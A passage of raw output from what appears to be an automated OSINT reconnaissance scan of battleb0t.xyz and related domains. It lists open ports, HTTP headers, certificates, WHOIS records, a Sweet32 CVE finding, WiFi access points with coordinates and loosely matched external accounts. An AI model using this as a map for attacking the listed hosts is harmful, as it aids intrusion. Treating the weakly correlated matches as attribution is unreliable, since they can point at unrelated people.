95:BB:C8:B6:24:D4:2D:39:FE:3C:BB:87:87:DD:4C:3D:
6E:F8:5C:00:34:71:DB
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : E8:3E:D0:DA:3E:F5:06:35:32:E7:57:28:BC:89:6B:C9:
03:D3:CB:D1:11:6B:EC:EB:69:E1:77:7D:6D:06:BD:6E
Timestamp : Mar 16 00:40:11.009 2023 GMT
Extensions: none
Signature : ecdsa-with-SHA256
30:45:02:20:04:85:7D:9E:71:55:A6:C5:38:5A:64:60:
05:9A:15:17:EA:9E:B4:58:0D:3C:86:17:2C:C3:17:21:
8A:21:DE:13:02:21:00:93:46:3A:71:BC:50:F5:73:1A:
31:49:1D:77:D8:F0:F3:D0:7E:06:7D:4A:BA:7A:E8:B4:
4B:2C:3E:84:83:8A:4F
Signature Algorithm: sha256WithRSAEncryption
78:10:ed:28:eb:d8:01:0b:d1:ab:19:2d:17:b5:cd:db:df:f0:
19:bb:c5:bf:e8:be:94:e0:d7:f7:4a:e4:78:eb:00:83:c4:77:
d7:fc:46:d2:7a:d8:2d:ae:b3:9c:1f:b1:2a:97:00:27:56:0d:
be:3b:56:d6:ea:2e:ac:0f:22:29:52:8c:2f:4e:a7:73:9a:8b:
01:f5:2d:ee:f8:6e:63:a3:e0:20:d2:6f:0f:23:ec:f3:e9:f5:
3a:da:07:33:d8:60:c2:43:1f:8b:32:3f:73:0c:e2:d3:be:13:
67:7a:78:16:d5:05:c8:0e:fc:fe:a1:13:73:df:ce:e4:30:4f:
fc:8a:88:a9:4b:94:16:66:3b:1f:a0:96:6e:fd:1e:fa:4a:d4:
c5:37:c1:78:37:3a:c2:f7:2a:52:e1:64:81:83:df:6c:ec:18:
9f:e8:7f:40:ba:dd:8d:ff:ab:1d:65:a2:95:0c:4b:2a:b3:d4:
36:dd:e6:94:5d:2a:ad:ec:e1:d1:0d:fe:4d:1f:eb:87:d5:03:
b5:2f:bd:c9:98:e1:60:20:bf:6e:0c:7a:85:90:e0:96:42:6a:
86:09:c1:bb:ce:bb:d7:7b:a4:b3:1a:c0:15:1c:0d:88:6b:61:
74:d0:93:ed:30:c2:a8:1b:7a:94:f2:58:8e:6d:bd:c5:15:f9:
a0:e1:79:05
| battleb0t.xyz |
| 2023-05-12 03:09:46 | Affiliate - Internet Name | No | DNS Resolver | 0 | 0 | 4 | 0 | None | 65.170.74.34.bc.googleusercontent.com | 34.74.170.65 |
| 2023-05-12 03:41:52 | HTTP Headers | No | Censys | 0 | 0 | 3 | 0 | None | {"Content_Length": ["315"], "_encoding": {"Content_Length": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8"}, "Server": ["Microsoft-HTTPAPI/2.0"], "Connection": ["close"], "Content_Type": ["text/html; charset=us-ascii"], "Date": ["<REDACTED>"]} | 45.131.109.53 |
| 2023-05-12 03:27:00 | Web Server | No | Web Server Identifier | 0 | 0 | 5 | 0 | None | cloudflare | {"content-encoding": "gzip", "nel": "{\"success_fraction\":0,\"report_to\":\"cf-nel\",\"max_age\":604800}", "referrer-policy": "same-origin", "permissions-policy": "accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()", "cross-origin-resource-policy": "same-origin", "transfer-encoding": "chunked", "alt-svc": "h3=\":443\"; ma=86400, h3-29=\":443\"; ma=86400", "expires": "Thu, 01 Jan 1970 00:00:01 GMT", "vary": "Accept-Encoding", "server": "cloudflare", "connection": "close", "report-to": "{\"endpoints\":[{\"url\":\"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=ZnKgqHhkfhEMG0RRLEy55qXrIGT89PCJPvhlAxU1THPzwDrL5gc7PkT%2B%2FxSKq2nR5SYE1oIsFspz8pOEUKsQOZN%2FSfuF%2FMxnliSNjDjXg8QSfRLZrnIM0lr2QA%3D%3D\"}],\"group\":\"cf-nel\",\"max_age\":604800}", "cf-mitigated": "challenge", "cache-control": "private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0", "date": "Fri, 12 May 2023 02:54:13 GMT", "x-frame-options": "SAMEORIGIN", "cross-origin-embedder-policy": "require-corp", "content-type": "text/html; charset=UTF-8", "cf-ray": "7c5f603759cec44a-EWR", "cross-origin-opener-policy": "same-origin"} |
| 2023-05-12 02:44:40 | Software Used | Yes | Tool - Wappalyzer | 0 | 0 | 2 | 0 | None | Font Awesome | funny.battleb0t.xyz |
| 2023-05-12 03:18:54 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | linksys (Net ID: 00:0C:41:A0:89:8A) | 32.8608, -79.9746 |
| 2023-05-12 03:09:52 | Affiliate - Internet Name | No | DNS Resolver | 0 | 0 | 3 | 0 | None | dgn.keyubu.com | 87.248.157.94 |
| 2023-05-12 02:55:11 | Open TCP Port | No | Censys | 0 | 0 | 2 | 0 | None | 87.248.157.102:25 | 87.248.157.102 |
| 2023-05-12 02:54:41 | Open TCP Port Banner | No | Censys | 0 | 0 | 3 | 0 | None | HTTP/1.1 404 Not Found
Server: Netlify
X-Nf-Request-Id: 01H04595A0C45NR8DMSR5TCKG9
Date: <REDACTED>
Content-Length: 0
| 104.196.30.220 |
| 2023-05-12 03:01:23 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.223): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 03:12:12 | Vulnerability - CVE High | Yes | Tool - testssl.sh | 0 | 2 | 2 | 0 | None | CVE-2016-2183
https://nvd.nist.gov/vuln/detail/CVE-2016-2183
Score: 7.5
Description: The DES and Triple DES ciphers, as used in the TLS, SSH, and IPSec protocols and other protocols and products, have a birthday bound of approximately four billion blocks, which makes it easier for remote attackers to obtain cleartext data via a birthday attack against a long-duration encrypted session, as demonstrated by an HTTPS session using Triple DES in CBC mode, aka a "Sweet32" attack. | 188.114.96.1 |
| 2023-05-12 02:54:23 | Open TCP Port Banner | No | Censys | 0 | 0 | 4 | 0 | None | HTTP/1.1 404 Not Found
Server: Netlify
X-Nf-Request-Id: 01H04DT6EFGA302FBVMKFT2XD1
Date: <REDACTED>
Content-Length: 0
| 2600:1f18:2489:8201::c8 |
| 2023-05-12 03:01:36 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.130): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 03:05:09 | Affiliate - Internet Name | No | Cross-Reference | 1 | 1 | 3 | 0 | None | github.com | https://github.com/BattleB0t |
| 2023-05-12 02:50:05 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 2 | 0 | None | [raw Hybrid Analysis sandbox report JSON not reproduced] | 185.199.110.153 |
| 2023-05-12 02:59:45 | SSL Certificate - Raw Data | No | Certificate Transparency | 2 | 0 | 1 | 0 | None | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
04:7b:a3:67:f4:76:b8:d0:86:bd:aa:81:68:7c:78:c6:53:24
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=US, O=Let's Encrypt, CN=R3
Validity
Not Before: Dec 13 18:07:07 2022 GMT
Not After : Mar 13 18:07:06 2023 GMT
Subject: CN=ayhu.xyz
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
RSA Public-Key: (2048 bit)
Modulus:
Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature, Key Encipherment
X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Key Identifier:
BE:C4:2E:77:A7:91:6D:C0:9E:C0:E1:04:BD:9C:50:CA:0E:A6:9A:78
X509v3 Authority Key Identifier:
keyid:14:2E:B3:17:B7:58:56:CB:AE:50:09:40:E6:1F:AF:9D:8B:14:C2:C6
Authority Information Access:
OCSP - URI:http://r3.o.lencr.org
CA Issuers - URI:http://r3.i.lencr.org/
X509v3 Subject Alternative Name:
DNS:ayhu.xyz, DNS:mail.ayhu.xyz, DNS:www.ayhu.xyz
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.1
Policy: 1.3.6.1.4.1.44947.1.1.1
CPS: http://cps.letsencrypt.org
CT Precertificate Poison: critical
NULL
Signature Algorithm: sha256WithRSAEncryption
| ayhu.xyz |
| 2023-05-12 03:18:57 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | MarvellAP8x (Net ID: 00:01:36:16:7E:FB) | 37.780462,-122.390564 |
| 2023-05-12 03:01:40 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.175): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 03:23:25 | Open TCP Port | No | Pulsedive | 0 | 0 | 3 | 0 | None | 188.114.96.8:8443 | 188.114.96.0/24 |
| 2023-05-12 03:09:05 | Affiliate - IP Address | No | DNS Look-aside | 0 | 0 | 3 | 0 | None | 165.232.113.76 | 165.232.113.85 |
| 2023-05-12 02:56:15 | Non-Standard HTTP Header | No | Strange Header Identifier | 0 | 0 | 3 | 0 | None | permissions-policy: accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=() | {"content-encoding": "gzip", "nel": "{\"success_fraction\":0,\"report_to\":\"cf-nel\",\"max_age\":604800}", "referrer-policy": "same-origin", "permissions-policy": "accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()", "cross-origin-resource-policy": "same-origin", "transfer-encoding": "chunked", "alt-svc": "h3=\":443\"; ma=86400, h3-29=\":443\"; ma=86400", "expires": "Thu, 01 Jan 1970 00:00:01 GMT", "vary": "Accept-Encoding", "server": "cloudflare", "connection": "close", "report-to": "{\"endpoints\":[{\"url\":\"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=u1lyJPU0WioZJ7gW30pw%2F1QYGnEvSi6VguD4iZQLy9JFxNjUYX7Kn2AvbK1RwFeWf6Bc3GtzenDe9QfSS82xeo%2BaVIIeURcDQSNP2UoyOSj%2Fo0e2kf0IgvowllGBeio%3D\"}],\"group\":\"cf-nel\",\"max_age\":604800}", "cf-mitigated": "challenge", "cache-control": "private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0", "date": "Fri, 12 May 2023 02:54:22 GMT", "x-frame-options": "SAMEORIGIN", "cross-origin-embedder-policy": "require-corp", "content-type": "text/html; charset=UTF-8", "cf-ray": "7c5f60715ea2423d-EWR", "cross-origin-opener-policy": "same-origin"} |
| 2023-05-12 03:01:32 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.70): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 02:44:12 | Co-Hosted Site | No | SSL Certificate Analyzer | 0 | 1 | 2 | 0 | None | github.io | www.battleb0t.xyz |
| 2023-05-12 02:54:13 | Linked URL - External | No | Web Spider | 0 | 0 | 2 | 0 | None | https://www.discord.com | https://battleb0t.xyz/ |
| 2023-05-12 03:01:29 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.30): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 03:23:02 | Account on External Site | No | Account Finder | 0 | 0 | 2 | 0 | None | giters (Category: coding)
https://giters.com/ayhu | ayhu |
| 2023-05-12 03:31:33 | Affiliate - Email Address | No | E-Mail Address Extractor | 0 | 0 | 3 | 0 | None | abuse@west.cn | Domain Name: AYU.XYZ
Registry Domain ID: D9607467-CNIC
Registrar WHOIS Server: whois.west.cn
Registrar URL: http://www.west.cn
Updated Date: 2023-02-11T09:04:01.0Z
Creation Date: 2015-08-20T20:34:37.0Z
Registry Expiry Date: 2023-08-20T23:59:59.0Z
Registrar: CHENGDU WEST DIMENSION DIGITAL TECHNOLOGY CO., LTD.
Registrar IANA ID: 1556
Domain Status: ok https://icann.org/epp#ok
Registrant Organization:
Registrant State/Province: Jiang Su
Registrant Country: CN
Registrant Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Admin Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Tech Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Name Server: NS5.MYHOSTADMIN.NET
Name Server: NS6.MYHOSTADMIN.NET
Name Server: NS1.MYHOSTADMIN.NET
Name Server: NS2.MYHOSTADMIN.NET
Name Server: NS3.MYHOSTADMIN.NET
Name Server: NS4.MYHOSTADMIN.NET
DNSSEC: unsigned
Billing Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Registrar Abuse Contact Email: abuse@west.cn
Registrar Abuse Contact Phone: +86.2862778877
URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
>>> Last update of WHOIS database: 2023-05-12T03:17:35.0Z <<<
For more information on Whois status codes, please visit https://icann.org/epp
>>> IMPORTANT INFORMATION ABOUT THE DEPLOYMENT OF RDAP: please visit
https://www.centralnic.com/support/rdap <<<
The Whois and RDAP services are provided by CentralNic, and contain
information pertaining to Internet domain names registered by our
our customers. By using this service you are agreeing (1) not to use any
information presented here for any purpose other than determining
ownership of domain names, (2) not to store or reproduce this data in
any way, (3) not to use any high-volume, automated, electronic processes
to obtain data from this service. Abuse of this service is monitored and
actions in contravention of these terms will result in being permanently
blacklisted. All data is (c) CentralNic Ltd (https://www.centralnic.com)
Access to the Whois and RDAP services is rate limited. For more
information, visit https://registrar-console.centralnic.com/pub/whois_guidance.
Domain Name: ayu.xyz
Registry Domain ID: xy74494296952501
Registrar WHOIS Server: whois.west.cn
Registrar URL: www.west.cn
Updated Date: 2015-08-20T20:34:39.0Z
Creation Date: 2015-08-20T20:34:39.0Z
Registrar Registration Expiration Date: 2023-08-20T20:34:39.0Z
Registrar: Chengdu west dimension digital technology Co., LTD
Registrar IANA ID: 1556
Reseller:
Domain Status: ok http://www.icann.org/epp#ok
Registry Registrant ID: Not Available From Registry
Registrant Name: REDACTED FOR PRIVACY
Registrant Organization: REDACTED FOR PRIVACY
Registrant Street: REDACTED FOR PRIVACY
Registrant City: REDACTED FOR PRIVACY
Registrant State/Province: Jiang Su
Registrant Postal Code: REDACTED FOR PRIVACY
Registrant Country: CN
Registrant Phone: REDACTED FOR PRIVACY
Registrant Phone Ext:
Registrant Fax: REDACTED FOR PRIVACY
Registrant Fax Ext:
Registrant Email: link at https://www.west.cn/web/whoisform?domain=ayu.xyz
Registry Admin ID: Not Available From Registry
Admin Name: REDACTED FOR PRIVACY
Admin Organization: REDACTED FOR PRIVACY
Admin Street: REDACTED FOR PRIVACY
Admin City: REDACTED FOR PRIVACY
Admin State/Province: REDACTED FOR PRIVACY
Admin Postal Code: REDACTED FOR PRIVACY
Admin Country: REDACTED FOR PRIVACY
Admin Phone: REDACTED FOR PRIVACY
Admin Phone Ext:
Admin Fax: REDACTED FOR PRIVACY
Admin Fax Ext:
Admin Email: link at https://www.west.cn/web/whoisform?domain=ayu.xyz
Registry Tech ID: Not Available From Registry
Tech Name: REDACTED FOR PRIVACY
Tech Organization: REDACTED FOR PRIVACY
Tech Street: REDACTED FOR PRIVACY
Tech City: REDACTED FOR PRIVACY
Tech State/Province: REDACTED FOR PRIVACY
Tech Postal Code: REDACTED FOR PRIVACY
Tech Country: REDACTED FOR PRIVACY
Tech Phone: REDACTED FOR PRIVACY
Tech Phone Ext:
Tech Fax: REDACTED FOR PRIVACY
Tech Fax Ext:
Tech Email: link at https://www.west.cn/web/whoisform?domain=ayu.xyz
Name Server: ns1.myhostadmin.net
Name Server: ns2.myhostadmin.net
DNSSEC: signedDelegation
Registrar Abuse Contact Email: westabuse@gmail.com
Registrar Abuse Contact Phone: +86.2862778877
URL of the ICANN WHOIS Data Problem Reporting System: http://wdprs.internic.net/
>>> Last update of WHOIS database: 2023-05-12T03:17:35.0Z <<<
For more information on Whois status codes, please visit https://www.icann.org/resources/pages/epp-status-codes-2014-06-16-en
|
| 2023-05-12 02:45:14 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 2 | 0 | None | [raw Hybrid Analysis search-result JSON not reproduced] | 185.199.111.153 |
| 2023-05-12 02:45:09 | Raw Data from RIRs | No | ipapi.co | 0 | 0 | 2 | 0 | None | {u'region_code': u'ON', u'country_tld': u'.ca', u'ip': u'104.21.6.166', u'currency_name': u'Dollar', u'currency': u'CAD', u'country_population': 37058856, u'country_code': u'CA', u'timezone': u'America/Toronto', u'city': u'Toronto', u'network': u'104.21.0.0/17', u'languages': u'en-CA,fr-CA,iu', u'version': u'IPv4', u'latitude': 43.6547, u'in_eu': False, u'utc_offset': u'-0400', u'continent_code': u'NA', u'country_name': u'Canada', u'country_capital': u'Ottawa', u'org': u'CLOUDFLARENET', u'postal': u'M5A', u'asn': u'AS13335', u'country': u'CA', u'region': u'Ontario', u'longitude': -79.3623, u'country_calling_code': u'+1', u'country_area': 9984670.0, u'country_code_iso3': u'CAN'} | 104.21.6.166 |
| 2023-05-12 03:01:39 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.162): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 02:55:27 | Linked URL - Internal | No | URLScan.io | 0 | 0 | 1 | 0 | None | http://kekw.battleb0t.xyz/jar | battleb0t.xyz |
| 2023-05-12 03:18:58 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | linksys (Net ID: 00:06:25:C4:0E:35) | 33.336199,-111.89446440830702 |
| 2023-05-12 02:44:23 | Open TCP Port | No | SSL Certificate Analyzer | 0 | 0 | 2 | 0 | None | 185.199.109.153:443 | 185.199.109.153 |
| 2023-05-12 02:44:05 | SSL Certificate - Issued by | No | CertSpotter | 0 | 0 | 1 | 0 | None | C=US,O=Cloudflare\, Inc.,CN=Cloudflare Inc ECC CA-3 | battleb0t.xyz |
| 2023-05-12 03:19:01 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | AIRTIES (Net ID: 00:12:BF:30:4A:F9) | 40.2024, 29.0398 |
| 2023-05-12 02:56:55 | Internet Name - Unresolved | No | DNS Resolver | 0 | 0 | 2 | 0 | None | tiktok.battleb0t.xyz | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
03:b3:d3:7f:a8:50:41:aa:70:38:c6:ab:16:2e:24:50:f9:66
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=US, O=Let's Encrypt, CN=R3
Validity
Not Before: Dec 29 13:55:16 2022 GMT
Not After : Mar 29 13:55:15 2023 GMT
Subject: CN=tiktok.battleb0t.xyz
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
RSA Public-Key: (2048 bit)
Modulus:
Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature, Key Encipherment
X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Key Identifier:
63:4E:15:85:56:5A:A4:94:02:C2:16:42:A4:A5:97:9A:38:02:57:97
X509v3 Authority Key Identifier:
keyid:14:2E:B3:17:B7:58:56:CB:AE:50:09:40:E6:1F:AF:9D:8B:14:C2:C6
Authority Information Access:
OCSP - URI:http://r3.o.lencr.org
CA Issuers - URI:http://r3.i.lencr.org/
X509v3 Subject Alternative Name:
DNS:tiktok.battleb0t.xyz
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.1
Policy: 1.3.6.1.4.1.44947.1.1.1
CPS: http://cps.letsencrypt.org
CT Precertificate Poison: critical
NULL
Signature Algorithm: sha256WithRSAEncryption
|
| 2023-05-12 02:50:30 | Physical Address | No | GLEIF | 2 | 0 | 3 | 0 | None | 14455 North Hayden Rd, Scottsdale, US-AZ, US, 85260 | GoDaddy.com, LLC |
| 2023-05-12 03:18:57 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | myLGNet4862 (Net ID: 00:01:36:5B:48:60) | 37.780462,-122.390564 |
| 2023-05-12 03:18:53 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | gunhome1 (Net ID: 00:09:5B:EE:D0:0E) | 39.0469, -77.4903 |
| 2023-05-12 03:01:10 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.122): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 03:23:40 | Open TCP Port | No | Pulsedive | 0 | 0 | 3 | 0 | None | 188.114.96.15:8443 | 188.114.96.0/24 |
| 2023-05-12 03:01:09 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.120): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 03:19:09 | Account on External Site | No | Account Finder | 0 | 0 | 6 | 0 | None | BIGO Live (Category: gaming)
https://www.bigo.tv/user/login | login |
| 2023-05-12 03:19:09 | Account on External Site | No | Account Finder | 0 | 0 | 6 | 0 | None | Demotywatory (Category: images)
https://demotywatory.pl/user/login | login |
| 2023-05-12 02:54:20 | Linked URL - Internal | No | Web Spider | 1 | 0 | 3 | 0 | None | https://funny.battleb0t.xyz/images/favicon.png | https://funny.battleb0t.xyz/ |
| 2023-05-12 03:01:14 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.129): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 03:23:27 | Open TCP Port | No | Pulsedive | 0 | 0 | 3 | 0 | None | 188.114.96.9:443 | 188.114.96.0/24 |
| 2023-05-12 02:53:20 | IP Address | No | Mnemonic PassiveDNS | 40 | 0 | 2 | 0 | None | 165.232.113.85 | kekw.battleb0t.xyz |
| 2023-05-12 02:47:23 | Open TCP Port | No | Pulsedive | 0 | 0 | 2 | 0 | None | 185.199.110.153:80 | 185.199.110.153 |
| 2023-05-12 02:56:51 | Internet Name | No | DNS Resolver | 0 | 0 | 2 | 0 | None | nwapi.battleb0t.xyz | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
03:96:9b:29:e7:ba:1f:ed:f3:53:36:ca:2c:46:93:27:46:97
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=US, O=Let's Encrypt, CN=R3
Validity
Not Before: Dec 13 15:44:09 2022 GMT
Not After : Mar 13 15:44:08 2023 GMT
Subject: CN=nwapi.battleb0t.xyz
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
RSA Public-Key: (4096 bit)
Modulus:
Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature, Key Encipherment
X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Key Identifier:
63:E8:B3:AA:B6:B4:6A:08:8C:66:4E:1B:FC:F4:D4:C0:C8:AD:D7:A5
X509v3 Authority Key Identifier:
keyid:14:2E:B3:17:B7:58:56:CB:AE:50:09:40:E6:1F:AF:9D:8B:14:C2:C6
Authority Information Access:
OCSP - URI:http://r3.o.lencr.org
CA Issuers - URI:http://r3.i.lencr.org/
X509v3 Subject Alternative Name:
DNS:nwapi.battleb0t.xyz
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.1
Policy: 1.3.6.1.4.1.44947.1.1.1
CPS: http://cps.letsencrypt.org
CT Precertificate Poison: critical
NULL
Signature Algorithm: sha256WithRSAEncryption
|
| 2023-05-12 03:19:09 | Account on External Site | No | Account Finder | 0 | 0 | 6 | 0 | None | untappd (Category: social)
https://untappd.com/user/login/ | login |
| 2023-05-12 03:18:51 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | SpeedStream (Net ID: 00:01:24:F0:07:E7) | 37.7642, -122.3993 |
| 2023-05-12 03:12:51 | Physical Location | No | numverify | 0 | 0 | 3 | 0 | None | Moskva, RU | +74955801111 |
| 2023-05-12 02:50:17 | Internet Name | No | DNS Resolver | 0 | 0 | 2 | 0 | None | vscode.battleb0t.xyz | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
03:56:b0:2c:f1:37:ec:4d:fb:ba:29:5b:fe:cf:08:f7:c5:d3
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=US, O=Let's Encrypt, CN=R3
Validity
Not Before: Jan 27 17:49:55 2023 GMT
Not After : Apr 27 17:49:54 2023 GMT
Subject: CN=vscode.battleb0t.xyz
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
RSA Public-Key: (4096 bit)
Modulus:
Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature, Key Encipherment
X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Key Identifier:
76:A0:A8:B9:3F:90:D7:08:DA:7E:1F:47:83:D5:88:5D:68:C9:9D:69
X509v3 Authority Key Identifier:
keyid:14:2E:B3:17:B7:58:56:CB:AE:50:09:40:E6:1F:AF:9D:8B:14:C2:C6
Authority Information Access:
OCSP - URI:http://r3.o.lencr.org
CA Issuers - URI:http://r3.i.lencr.org/
X509v3 Subject Alternative Name:
DNS:vscode.battleb0t.xyz
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.1
Policy: 1.3.6.1.4.1.44947.1.1.1
CPS: http://cps.letsencrypt.org
CT Precertificate Poison: critical
NULL
Signature Algorithm: sha256WithRSAEncryption
|
| 2023-05-12 03:18:53 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | linksys-n (Net ID: 00:00:85:EB:4B:63) | 41.8781, -87.6298 |
| 2023-05-12 03:03:47 | Co-Hosted Site | No | ThreatMiner | 2 | 0 | 2 | 0 | None | akashpmani.github.io | 185.199.111.153 |
| 2023-05-12 03:19:00 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | <hidden ssid> (Net ID: 00:01:E3:54:E7:17) | 52.3759, 4.8975 |
| 2023-05-12 03:03:39 | Co-Hosted Site - Domain Name | No | DNS Resolver | 0 | 0 | 3 | 0 | None | github.io | 0101.github.io |
| 2023-05-12 03:03:16 | Internet Name - Unresolved | No | DNS Resolver | 0 | 0 | 2 | 0 | None | cpcontacts.ayhu.xyz | |
| 2023-05-12 03:24:29 | Affiliate - Company Name | No | Company Name Extractor | 0 | 0 | 7 | 0 | None | GoDaddy.com, LLC | Domain Name: AMCODEV.ME
Registry Domain ID: D425500000016166846-AGRS
Registrar WHOIS Server: whois.godaddy.com
Registrar URL: http://www.godaddy.com
Updated Date: 2023-01-03T11:02:11Z
Creation Date: 2018-01-02T22:12:38Z
Registry Expiry Date: 2024-01-02T22:12:38Z
Registrar Registration Expiration Date:
Registrar: GoDaddy.com, LLC
Registrar IANA ID: 146
Registrar Abuse Contact Email: abuse@godaddy.com
Registrar Abuse Contact Phone: +1.4806242505
Reseller:
Domain Status: clientDeleteProhibited https://icann.org/epp#clientDeleteProhibited
Domain Status: clientRenewProhibited https://icann.org/epp#clientRenewProhibited
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Domain Status: clientUpdateProhibited https://icann.org/epp#clientUpdateProhibited
Registrant Organization: Domains By Proxy, LLC
Registrant State/Province: Arizona
Registrant Country: US
Name Server: DNS1.STABLETRANSIT.COM
Name Server: DNS2.STABLETRANSIT.COM
DNSSEC: unsigned
URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
>>> Last update of WHOIS database: 2023-05-12T03:11:14Z <<<
For more information on Whois status codes, please visit https://icann.org/epp
Access to WHOIS information is provided to assist persons in determining the contents of a domain name registration record in the registry database. The data in this record is provided by The Registry Operator for informational purposes only, and accuracy is not guaranteed. This service is intended only for query-based access. You agree that you will use this data only for lawful purposes and that, under no circumstances will you use this data to (a) allow, enable, or otherwise support the transmission by e-mail, telephone, or facsimile of mass unsolicited, commercial advertising or solicitations to entities other than the data recipient's own existing customers; or (b) enable high volume, automated, electronic processes that send queries or data to the systems of Registry Operator, a Registrar, or Afilias except as reasonably necessary to register domain names or modify existing registrations. All rights reserved. Registry Operator reserves the right to modify these terms at any time. By submitting this query, you agree to abide by this policy.
The Registrar of Record identified in this output may have an RDDS service that can be queried for additional information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Domain Name: amcodev.me
Registry Domain ID: D425500000016166846-AGRS
Registrar WHOIS Server: whois.godaddy.com
Registrar URL: https://www.godaddy.com
